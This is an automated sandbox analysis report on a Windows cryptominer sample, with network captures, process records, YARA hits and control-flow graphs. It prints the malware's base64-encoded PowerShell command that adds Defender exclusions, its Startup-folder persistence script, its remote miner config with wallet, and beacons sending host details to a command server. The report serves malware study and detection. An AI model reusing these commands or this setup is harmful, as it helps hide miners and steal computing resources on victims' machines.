                                                                                                      Dec 12, 2024 20:38:05.143121958 CET498894444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:38:05.311374903 CET444449889192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:38:06.960567951 CET444449889192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:38:06.960642099 CET498894444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:38:11.422194004 CET499494444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:38:11.542934895 CET444449949192.168.0.100192.168.2.5
                                                                                                      Dec 12, 2024 20:38:11.546869040 CET499494444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:38:11.547072887 CET499494444192.168.2.5192.168.0.100
                                                                                                      Dec 12, 2024 20:38:11.667231083 CET444449949192.168.0.100192.168.2.5
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 12, 2024 20:36:19.985337019 CET6404753192.168.2.51.1.1.1
                                                                                                      Dec 12, 2024 20:36:20.241322041 CET53640471.1.1.1192.168.2.5
                                                                                                      Dec 12, 2024 20:36:21.247344017 CET5858353192.168.2.51.1.1.1
                                                                                                      Dec 12, 2024 20:36:21.820828915 CET53585831.1.1.1192.168.2.5
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 12, 2024 20:36:19.985337019 CET192.168.2.51.1.1.10x90b2Standard query (0)pool.hashvault.proA (IP address)IN (0x0001)false
                                                                                                      Dec 12, 2024 20:36:21.247344017 CET192.168.2.51.1.1.10xe7c0Standard query (0)woo097878781.winA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 12, 2024 20:36:20.241322041 CET1.1.1.1192.168.2.50x90b2No error (0)pool.hashvault.pro37.203.243.102A (IP address)IN (0x0001)false
                                                                                                      Dec 12, 2024 20:36:20.241322041 CET1.1.1.1192.168.2.50x90b2No error (0)pool.hashvault.pro5.188.137.200A (IP address)IN (0x0001)false
                                                                                                      Dec 12, 2024 20:36:21.820828915 CET1.1.1.1192.168.2.50xe7c0No error (0)woo097878781.win154.216.20.243A (IP address)IN (0x0001)false
                                                                                                      • woo097878781.win
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.549705154.216.20.2434436760C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-12 19:36:23 UTC111OUTGET /P.txt HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Connection: close
                                                                                                      Host: woo097878781.win
                                                                                                      User-Agent: cpp-httplib/0.12.6
                                                                                                      2024-12-12 19:36:23 UTC302INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 12 Dec 2024 19:36:23 GMT
                                                                                                      Content-Type: text/plain
                                                                                                      Content-Length: 478
                                                                                                      Connection: close
                                                                                                      X-Accel-Version: 0.01
                                                                                                      Last-Modified: Thu, 12 Dec 2024 02:48:02 GMT
                                                                                                      ETag: "1de-62909be2a2780"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Powered-By: PleskLin
                                                                                                      2024-12-12 19:36:23 UTC478INData Raw: 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20
                                                                                                      Data Ascii: { "algo": "rx/0", "pool": "192.168.0.100", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": true,


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.549707154.216.20.2434436760C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-12 19:36:25 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Connection: close
                                                                                                      Content-Length: 326
                                                                                                      Content-Type: application/json
                                                                                                      Host: woo097878781.win
                                                                                                      User-Agent: cpp-httplib/0.12.6
                                                                                                      2024-12-12 19:36:25 UTC326OUTData Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 38 34 39 39 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 50 35 48 4d 42 43 43 54 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22
                                                                                                      Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"284992","username":"user","gpu":"P5HMBCCT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"
                                                                                                      2024-12-12 19:36:26 UTC264INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 12 Dec 2024 19:36:26 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      X-Powered-By: PHP/8.3.14
                                                                                                      X-Robots-Tag: noindex, nofollow
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Powered-By: PleskLin
                                                                                                      2024-12-12 19:36:26 UTC28INData Raw: 31 31 0d 0a 7b 22 72 65 73 70 6f 6e 73 65 22 3a 22 6f 6b 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 11{"response":"ok"}0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.549835154.216.20.2434436760C:\Windows\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-12 19:37:22 UTC179OUTPOST /66/api/endpoint.php HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Connection: close
                                                                                                      Content-Length: 339
                                                                                                      Content-Type: application/json
                                                                                                      Host: woo097878781.win
                                                                                                      User-Agent: cpp-httplib/0.12.6
                                                                                                      2024-12-12 19:37:22 UTC339OUTData Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 38 34 39 39 32 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 50 35 48 4d 42 43 43 54 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a 22
                                                                                                      Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"284992","username":"user","gpu":"P5HMBCCT","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"
                                                                                                      2024-12-12 19:37:23 UTC264INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 12 Dec 2024 19:37:23 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      X-Powered-By: PHP/8.3.14
                                                                                                      X-Robots-Tag: noindex, nofollow
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Powered-By: PleskLin
                                                                                                      2024-12-12 19:37:23 UTC12INData Raw: 32 0d 0a 7b 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 2{}0


                                                                                                      Click to jump to process

                                                                                                      Click to jump to process

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Click to jump to process

                                                                                                      Target ID:0
                                                                                                      Start time:14:36:10
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                      Imagebase:0x26b466e0000
                                                                                                      File size:5'876'736 bytes
                                                                                                      MD5 hash:53E3F2BACA38239BD6025B9E18E5F202
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2201146076.0000026B4888C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2585182229.0000026B61CA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2235805876.0000026B5ACAE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:14:36:12
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwARABlAHMAawB0AG8AcABcAGYAaQBsAGUALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAGwAZgBvAG4AcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVwBpAG4AZABvAHMAQwBQAFUAcwB5AHMAdABlAG0ALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGEAbABmAG8AbgBzAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABXAGkAbgBkAG8AcwBDAFAAVQBzAHkAcwB0AGUAbQAuAGUAeABlAA==
                                                                                                      Imagebase:0x7ff7be880000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:14:36:12
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6d64d0000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:14:36:15
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                      Imagebase:0x7ff6ef0c0000
                                                                                                      File size:496'640 bytes
                                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:14:36:18
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x1f778b70000
                                                                                                      File size:55'824 bytes
                                                                                                      MD5 hash:DF5419B32657D2896514B6A1D041FE08
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:6
                                                                                                      Start time:14:36:18
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\explorer.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:explorer.exe
                                                                                                      Imagebase:0x7ff674740000
                                                                                                      File size:5'141'208 bytes
                                                                                                      MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000006.00000002.3379529073.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                      Reputation:high
                                                                                                      Has exited:false

                                                                                                      Target ID:8
                                                                                                      Start time:14:36:28
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindosCPUsystem.vbs"
                                                                                                      Imagebase:0x7ff6a6590000
                                                                                                      File size:170'496 bytes
                                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:14:36:29
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\WindosCPUsystem.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\WindosCPUsystem.exe"
                                                                                                      Imagebase:0x2278ea50000
                                                                                                      File size:5'876'736 bytes
                                                                                                      MD5 hash:53E3F2BACA38239BD6025B9E18E5F202
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.2333963744.0000022790D6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                      • Detection: 24%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:14:36:30
                                                                                                      Start date:12/12/2024
                                                                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"
                                                                                                      Imagebase:0x20ae41a0000
                                                                                                      File size:55'824 bytes
                                                                                                      MD5 hash:DF5419B32657D2896514B6A1D041FE08
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:8.6%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:5
                                                                                                        Total number of Limit Nodes:1
                                                                                                        execution_graph 23795 7ff848f25c40 23796 7ff848f36e90 23795->23796 23797 7ff848f37093 23796->23797 23798 7ff848f3724d VirtualAlloc 23796->23798 23799 7ff848f372a5 23798->23799

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1061 7ff8490ccc43-7ff8490ccc75 1065 7ff8490ccc77 1061->1065 1066 7ff8490ccc79-7ff8490ccc9f 1061->1066 1065->1066 1067 7ff8490cccb9 1065->1067 1070 7ff8490cccba-7ff8490cccd3 1066->1070 1073 7ff8490ccca1-7ff8490cccb7 1066->1073 1067->1070 1071 7ff8490ccd71-7ff8490ccdae 1070->1071 1072 7ff8490cccd9-7ff8490ccce6 1070->1072 1081 7ff8490ccdb5-7ff8490ccdcd 1071->1081 1078 7ff8490ccd04-7ff8490ccd07 1072->1078 1079 7ff8490ccce8-7ff8490cccf9 1072->1079 1073->1067 1078->1081 1082 7ff8490ccd0d-7ff8490ccd55 1078->1082 1083 7ff8490cccfe-7ff8490ccd02 1079->1083 1088 7ff8490ccdd0-7ff8490ccdec 1081->1088 1089 7ff8490ccdcf 1081->1089 1082->1081 1085 7ff8490ccd57-7ff8490ccd5b 1082->1085 1083->1085 1091 7ff8490ccd62-7ff8490ccd70 1085->1091 1092 7ff8490ccdf2-7ff8490ccdf8 1088->1092 1093 7ff8490cce89-7ff8490ccebc 1088->1093 1089->1088 1095 7ff8490cce18-7ff8490cce26 1092->1095 1096 7ff8490ccdfa-7ff8490ccdfd 1092->1096 1102 7ff8490ccec3-7ff8490ccf06 1093->1102 1095->1102 1103 7ff8490cce2c-7ff8490cce44 1095->1103 1098 7ff8490cce45-7ff8490cce82 1096->1098 1099 7ff8490ccdff-7ff8490cce17 1096->1099 1098->1093 1111 7ff8490ccf0d-7ff8490ccf0f 1102->1111 1112 7ff8490ccf11-7ff8490ccf29 1111->1112 1113 7ff8490ccf2a-7ff8490ccf90 1111->1113 1120 7ff8490ccfa2-7ff8490ccfa6 1113->1120 1121 7ff8490ccf92-7ff8490ccf9d call 7ff8490ccb60 1113->1121 1123 7ff8490ccfb4-7ff8490ccfc1 1120->1123 1124 7ff8490ccfa8-7ff8490ccfb3 1120->1124 1121->1120 1125 7ff8490cd417-7ff8490cd45f 1123->1125 1126 7ff8490ccfc7-7ff8490ccfda 1123->1126 1139 7ff8490cd466-7ff8490cd47f 1125->1139 1140 7ff8490cd461 1125->1140 1127 7ff8490ccfdc-7ff8490ccfe7 1126->1127 1128 7ff8490ccfe8-7ff8490ccff3 1126->1128 1130 7ff8490ccff9-7ff8490cd005 1128->1130 1131 7ff8490cd24a-7ff8490cd271 1128->1131 1130->1125 1133 7ff8490cd00b-7ff8490cd026 1130->1133 1142 7ff8490cd278-7ff8490cd29f 1131->1142 1136 7ff8490cd034-7ff8490cd038 1133->1136 1137 7ff8490cd028-7ff8490cd033 1133->1137 1141 7ff8490cd03e-7ff8490cd04a 1136->1141 1136->1142 1157 7ff8490cd481-7ff8490cd498 1139->1157 1158 7ff8490cd49c-7ff8490cd526 1139->1158 1140->1139 1141->1125 1144 7ff8490cd050-7ff8490cd06b 1141->1144 1150 7ff8490cd2a6-7ff8490cd2b1 1142->1150 1145 7ff8490cd077-7ff8490cd07b 1144->1145 1146 7ff8490cd06d-7ff8490cd072 1144->1146 1145->1150 1151 7ff8490cd081-7ff8490cd08d 1145->1151 1149 7ff8490cd243-7ff8490cd249 1146->1149 1162 7ff8490cd305 1150->1162 1163 7ff8490cd2b3-7ff8490cd2cd 1150->1163 1151->1125 1154 7ff8490cd093-7ff8490cd0ae 1151->1154 1159 7ff8490cd0b0-7ff8490cd0b5 1154->1159 1160 7ff8490cd0ba-7ff8490cd0be 1154->1160 1157->1158 1159->1149 1165 7ff8490cd2d4-7ff8490cd2fb 1160->1165 1166 7ff8490cd0c4-7ff8490cd0d0 1160->1166 1167 7ff8490cd307-7ff8490cd30f 1162->1167 1168 7ff8490cd311-7ff8490cd329 1162->1168 1163->1165 1179 7ff8490cd302-7ff8490cd303 1165->1179 1166->1125 1171 7ff8490cd0d6-7ff8490cd0f1 1166->1171 1167->1168 1185 7ff8490cd330-7ff8490cd357 1168->1185 1174 7ff8490cd0f3-7ff8490cd0f8 1171->1174 1175 7ff8490cd0fd-7ff8490cd101 1171->1175 1174->1149 1178 7ff8490cd107-7ff8490cd113 1175->1178 1175->1179 1178->1125 1181 7ff8490cd119-7ff8490cd134 1178->1181 1179->1162 1183 7ff8490cd136-7ff8490cd13b 1181->1183 1184 7ff8490cd140-7ff8490cd144 1181->1184 1183->1149 1184->1185 1186 7ff8490cd14a-7ff8490cd156 1184->1186 1192 7ff8490cd35e-7ff8490cd369 1185->1192 1186->1125 1188 7ff8490cd15c-7ff8490cd177 1186->1188 1189 7ff8490cd183-7ff8490cd187 1188->1189 1190 7ff8490cd179-7ff8490cd17e 1188->1190 1191 7ff8490cd18d-7ff8490cd199 1189->1191 1189->1192 1190->1149 1191->1125 1194 7ff8490cd19f-7ff8490cd1ba 1191->1194 1196 7ff8490cd1c6-7ff8490cd1ca 1194->1196 1197 7ff8490cd1bc-7ff8490cd1c1 1194->1197 1199 7ff8490cd1d0-7ff8490cd1dc 1196->1199 1200 7ff8490cd38c-7ff8490cd3b3 1196->1200 1197->1149 1199->1125 1201 7ff8490cd1e2-7ff8490cd1fd 1199->1201 1207 7ff8490cd3ba-7ff8490cd3e1 1200->1207 1203 7ff8490cd206-7ff8490cd20a 1201->1203 1204 7ff8490cd1ff-7ff8490cd204 1201->1204 1206 7ff8490cd210-7ff8490cd217 1203->1206 1203->1207 1204->1149 1206->1125 1209 7ff8490cd21d-7ff8490cd238 1206->1209 1212 7ff8490cd3e8-7ff8490cd416 1207->1212 1211 7ff8490cd23e 1209->1211 1209->1212 1211->1149 1212->1125
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2661482120.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ff8490c0000_file.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p_I
                                                                                                        • API String ID: 0-3631482803
                                                                                                        • Opcode ID: c5a06c84d35cdefe9f38e7d2648142c602401bf0856a3061d97cda3515d14c58
                                                                                                        • Instruction ID: 38ccba7ca8738c726e1bde14a301866f05a41fd3c961536f15f3a6683fb2ac1e
                                                                                                        • Opcode Fuzzy Hash: c5a06c84d35cdefe9f38e7d2648142c602401bf0856a3061d97cda3515d14c58
                                                                                                        • Instruction Fuzzy Hash: 9942FB30A0CE9A4FEB6DEF6884546B977E2FFA4391F14457AD04AC36C5DF28E8428741

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1219 7ff8490c31f2-7ff8490c3209 1221 7ff8490c3216-7ff8490c326f 1219->1221 1222 7ff8490c320b-7ff8490c3215 1219->1222 1225 7ff8490c3271-7ff8490c3276 1221->1225 1226 7ff8490c3279-7ff8490c3289 1221->1226 1222->1221 1225->1226 1227 7ff8490c3799-7ff8490c37a4 1226->1227 1228 7ff8490c328f-7ff8490c32a9 1226->1228 1229 7ff8490c37a6-7ff8490c37ab 1227->1229 1230 7ff8490c37ae-7ff8490c3801 1227->1230 1232 7ff8490c36a6-7ff8490c36b1 1228->1232 1233 7ff8490c32af-7ff8490c32ba 1228->1233 1229->1230 1234 7ff8490c3808-7ff8490c380e 1230->1234 1243 7ff8490c36b3-7ff8490c36f8 1232->1243 1244 7ff8490c36a1 1232->1244 1235 7ff8490c32d7-7ff8490c3310 1233->1235 1236 7ff8490c32bc-7ff8490c32cd 1233->1236 1237 7ff8490c3814-7ff8490c381d 1234->1237 1238 7ff8490c3738-7ff8490c3743 1234->1238 1254 7ff8490c3312-7ff8490c3331 1235->1254 1255 7ff8490c333b-7ff8490c33a0 1235->1255 1236->1235 1251 7ff8490c32cf-7ff8490c32d4 1236->1251 1240 7ff8490c3823-7ff8490c382e 1237->1240 1241 7ff8490c3a08-7ff8490c3a1f 1237->1241 1238->1227 1240->1241 1247 7ff8490c3834-7ff8490c3837 1240->1247 1250 7ff8490c3a23-7ff8490c3a56 1241->1250 1252 7ff8490c36ff-7ff8490c3731 1243->1252 1244->1232 1247->1252 1253 7ff8490c383d-7ff8490c38de call 7ff8490c2ec8 1247->1253 1251->1235 1252->1238 1288 7ff8490c38e4-7ff8490c38ec 1253->1288 1289 7ff8490c3b0d-7ff8490c3b16 1253->1289 1254->1255 1268 7ff8490c3597-7ff8490c359a 1255->1268 1271 7ff8490c35a0-7ff8490c35b8 1268->1271 1272 7ff8490c3639-7ff8490c3640 1268->1272 1277 7ff8490c3b6e-7ff8490c3b86 1271->1277 1278 7ff8490c35be-7ff8490c35c5 1271->1278 1276 7ff8490c3bd2-7ff8490c3bf2 call 7ff8490c3bf3 1272->1276 1285 7ff8490c364a-7ff8490c369f 1277->1285 1286 7ff8490c3b8c-7ff8490c3b97 1277->1286 1282 7ff8490c35c7-7ff8490c35e9 1278->1282 1291 7ff8490c35f0-7ff8490c35fc 1282->1291 1285->1244 1286->1276 1292 7ff8490c38fb-7ff8490c3912 1288->1292 1293 7ff8490c38ee-7ff8490c38f3 1288->1293 1296 7ff8490c39b8-7ff8490c39dc 1289->1296 1297 7ff8490c3b1c-7ff8490c3b24 1289->1297 1294 7ff8490c3609-7ff8490c3637 1291->1294 1295 7ff8490c35fe-7ff8490c3607 1291->1295 1307 7ff8490c3a5b-7ff8490c3a96 1292->1307 1308 7ff8490c3918-7ff8490c39b2 call 7ff8490c2e58 1292->1308 1293->1292 1294->1272 1295->1272 1295->1294 1296->1268 1303 7ff8490c39e2-7ff8490c39ee 1296->1303 1297->1296 1301 7ff8490c3b2a-7ff8490c3b33 1297->1301 1301->1296 1304 7ff8490c3b39-7ff8490c3b69 call 7ff8490c2e18 1301->1304 1303->1250 1304->1296 1312 7ff8490c3ab0-7ff8490c3ab4 1307->1312 1313 7ff8490c3a98-7ff8490c3aae 1307->1313 1308->1296 1317 7ff8490c3ab7-7ff8490c3b08 1312->1317 1313->1317 1317->1296
                                                                                                        Strings
                                                                                                        Memory Dump Source
